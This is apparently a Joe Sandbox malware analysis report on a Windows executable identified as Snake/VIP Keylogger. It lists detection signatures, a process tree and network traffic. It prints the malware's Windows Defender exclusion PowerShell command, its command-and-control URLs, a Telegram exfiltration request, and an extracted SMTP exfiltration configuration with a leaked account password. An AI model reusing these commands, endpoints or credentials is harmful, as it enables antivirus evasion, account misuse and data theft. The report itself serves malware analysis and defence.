Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VbcXXnmIwPPhh.exe

Overview

General Information

Sample name:VbcXXnmIwPPhh.exe
Analysis ID:1519406
MD5:401098a467fc699acb2d256da47fdace
SHA1:87484e36df3eb0290178e4ab85b5566fb6f92b16
SHA256:c803bffcf528efc9a204a34a6a9285128f9dce25d165020fc37198d16ee50c11
Tags:exeMassLogger
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • VbcXXnmIwPPhh.exe (PID: 6212 cmdline: "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe" MD5: 401098A467FC699ACB2D256DA47FDACE)
    • powershell.exe (PID: 2620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5832 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • VbcXXnmIwPPhh.exe (PID: 4888 cmdline: "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe" MD5: 401098A467FC699ACB2D256DA47FDACE)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "legacylog@jhxkgroup.online", "Password": "7213575aceACE@@  ", "Host": "mail.jhxkgroup.online", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "legacylog@jhxkgroup.online", "Password": "7213575aceACE@@  ", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2e434:$a1: get_encryptedPassword
        • 0x2e9bc:$a2: get_encryptedUsername
        • 0x2e0a7:$a3: get_timePasswordChanged
        • 0x2e1be:$a4: get_passwordField
        • 0x2e44a:$a5: set_encryptedPassword
        • 0x31173:$a6: get_passwords
        • 0x31507:$a7: get_logins
        • 0x3115f:$a8: GetOutlookPasswords
        • 0x30b18:$a9: StartKeylogger
        • 0x31460:$a10: KeyLoggerEventArgs
        • 0x30bb8:$a11: KeyLoggerEventArgsEventHandler
        00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 15 entries
          SourceRuleDescriptionAuthorStrings
          6.2.VbcXXnmIwPPhh.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            6.2.VbcXXnmIwPPhh.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              6.2.VbcXXnmIwPPhh.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                6.2.VbcXXnmIwPPhh.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  6.2.VbcXXnmIwPPhh.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2e634:$a1: get_encryptedPassword
                  • 0x2ebbc:$a2: get_encryptedUsername
                  • 0x2e2a7:$a3: get_timePasswordChanged
                  • 0x2e3be:$a4: get_passwordField
                  • 0x2e64a:$a5: set_encryptedPassword
                  • 0x31373:$a6: get_passwords
                  • 0x31707:$a7: get_logins
                  • 0x3135f:$a8: GetOutlookPasswords
                  • 0x30d18:$a9: StartKeylogger
                  • 0x31660:$a10: KeyLoggerEventArgs
                  • 0x30db8:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 26 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe", ParentImage: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe, ParentProcessId: 6212, ParentProcessName: VbcXXnmIwPPhh.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe", ProcessId: 2620, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe", ParentImage: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe, ParentProcessId: 6212, ParentProcessName: VbcXXnmIwPPhh.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe", ProcessId: 2620, ProcessName: powershell.exe
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 217.12.218.219, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe, Initiated: true, ProcessId: 4888, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49727
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe", ParentImage: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe, ParentProcessId: 6212, ParentProcessName: VbcXXnmIwPPhh.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe", ProcessId: 2620, ProcessName: powershell.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-26T13:44:11.001792+020028033053Unknown Traffic192.168.2.749706188.114.96.3443TCP
                  2024-09-26T13:44:13.000341+020028033053Unknown Traffic192.168.2.749708188.114.96.3443TCP
                  2024-09-26T13:44:16.852101+020028033053Unknown Traffic192.168.2.749712188.114.96.3443TCP
                  2024-09-26T13:44:18.300570+020028033053Unknown Traffic192.168.2.749715188.114.96.3443TCP
                  2024-09-26T13:44:23.107514+020028033053Unknown Traffic192.168.2.749725188.114.96.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-26T13:44:08.575080+020028032742Potentially Bad Traffic192.168.2.749701132.226.8.16980TCP
                  2024-09-26T13:44:10.278251+020028032742Potentially Bad Traffic192.168.2.749701132.226.8.16980TCP
                  2024-09-26T13:44:12.434480+020028032742Potentially Bad Traffic192.168.2.749707132.226.8.16980TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                  Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                  Source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "legacylog@jhxkgroup.online", "Password": "7213575aceACE@@ ", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}
                  Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "legacylog@jhxkgroup.online", "Password": "7213575aceACE@@ ", "Host": "mail.jhxkgroup.online", "Port": "587"}
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: VbcXXnmIwPPhh.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: VbcXXnmIwPPhh.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49705 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49726 version: TLS 1.2
                  Source: VbcXXnmIwPPhh.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: geWD.pdbSHA256 source: VbcXXnmIwPPhh.exe
                  Source: Binary string: geWD.pdb source: VbcXXnmIwPPhh.exe
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 4x nop then jmp 0168F8E9h6_2_0168F631
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 4x nop then jmp 0168FD41h6_2_0168FA88
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 4x nop then jmp 06DF0D0Dh6_2_06DF0B30
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 4x nop then jmp 06DF1697h6_2_06DF0B30
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 4x nop then jmp 06DF31E0h6_2_06DF2DC8
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 4x nop then jmp 06DF2C19h6_2_06DF2968
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 4x nop then jmp 06DFE959h6_2_06DFE6B0
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 4x nop then jmp 06DFE501h6_2_06DFE258
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 4x nop then jmp 06DFE0A9h6_2_06DFDE00
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 4x nop then jmp 06DFF661h6_2_06DFF3B8
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 4x nop then jmp 06DFF209h6_2_06DFEF60
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 4x nop then jmp 06DFEDB1h6_2_06DFEB08
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 4x nop then jmp 06DFD3A1h6_2_06DFD0F8
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 4x nop then jmp 06DFCF49h6_2_06DFCCA0
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_06DF0040
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 4x nop then jmp 06DFFAB9h6_2_06DFF810
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 4x nop then jmp 06DF31E0h6_2_06DF2DBF
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 4x nop then jmp 06DFDC51h6_2_06DFD9A8
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 4x nop then jmp 06DFD7F9h6_2_06DFD550
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 4x nop then jmp 06DF31E0h6_2_06DF310E

                  Networking

                  barindex
                  Source: unknownDNS query: name: api.telegram.org
                  Source: Yara matchFile source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE
                  Source: global trafficTCP traffic: 192.168.2.7:49727 -> 217.12.218.219:587
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2027/09/2024%20/%2000:14:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 217.12.218.219 217.12.218.219
                  Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                  Source: Joe Sandbox ViewASN Name: ITLDC-NLUA ITLDC-NLUA
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49707 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49701 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49712 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49708 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49715 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49725 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49706 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.7:49727 -> 217.12.218.219:587
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49705 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2027/09/2024%20/%2000:14:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficDNS traffic detected: DNS query: mail.jhxkgroup.online
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 26 Sep 2024 11:44:23 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/RapidSSLGlobalTLSRSA4096SHA2562022CA1.crt0
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
